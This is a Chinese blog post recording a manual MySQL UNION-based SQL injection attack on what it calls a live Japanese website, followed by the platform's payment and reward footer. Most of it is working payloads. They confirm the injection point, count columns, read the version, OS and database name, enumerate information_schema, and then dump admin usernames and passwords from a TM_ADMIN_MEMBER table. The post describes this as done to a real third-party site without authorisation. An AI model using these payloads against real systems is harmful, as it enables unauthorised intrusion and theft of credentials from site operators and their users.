mysql报错注入实战_MySQL手工注入实战

实战记录,日本某站

注入点 and 语句测试

and1=1 返回正常,and=2跳回首页,可能过滤了

70425592e6b505b1937d510ed97bfec8.png

6e5a01b790b05d1bc68942b2769db505.png

用 ’ 测试返回错误页面

判断为注入点

42250c813127ed9a41b1602062eb580e.png

order by语句查询字段数

fa46133ce6b7a15fd6b885d9e1ab9b65.png

8b5db3095c5678a4a262eac9eb08b469.png

测试字段数为9

05593fa7f21f897851d7d85e2de29bde.png

and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9

报错联合查询语句,查询显示位

2、3为显示位

bd4879a0c81c12b2f35e7e85937b096d.png

使用注入函数可爆出数据库版本信息

c84b5778b9ee541034607f64849ed1ff.png

and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9

注入函数@@version_compile_os爆出操作系统

b7faebb11fbd6123b5348cc30d2dbc9d.png

and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9

用注入函数database()爆出当前库

ed16116874ac3470aa5f7aa0919d2ba4.png

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1

c7c0fae0641a66b9c4cd54d54da31c70.png

库1

爆出第二个数据库,limit1,1即可

发现第二个数据库就是当前库

1bc111ae271e322f72a20f1ee82804c6.png

库2

and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES whereTABLE_SCHEMA=(库2名字16进制)limit 0,1

爆第一个表名,数据库名要转换为16进制

f961ca3730cb4f87bbc1ac4d3b27cd73.png

表1 敏感表

改为limit 1,1可爆第二个表名

a42c53b12bb6fdf8e0ddd30584f5029e.png

表2

and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1

使用group_concat(table_name)可以一次爆出全部表名

d0d84553e9cad7b281dd7aacf88cf8e6.png

已得到敏感表名TM_ADMIN_MEMBER,接下来爆字段

表名要转换为16进制

and 1=2 union select

1,COLUMN_NAME,3,4,5,6,7,8,9 from

information_schema.COLUMNSwhere TABLE_NAME= limit 0,1

ccfdeb6684b6534567cdf4010f2a98b9.png

推荐使用这种方法

and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME= limit 0,1

#COLUMN  翻译为  列

用 group_concat(COLUMN_NAME)函数可以一次爆出全部字段

或者可以修改limit 1,1、limit 2,1.......来一个一个爆出

68dbd785841e97197af55fa34b39c3dc.png

敏感字段

有敏感表名,敏感字段名后就获取内容

经测试login_uid字段存放的是用户名

login_pwd存放的是密码

and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名

30ee52900d7c274ccba7b372a257041b.png

接下来的自行脑补.......ca21afcec72d75337ba4bbea62fb9b05.gif

欢迎各位大神指点批评!

晨风

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值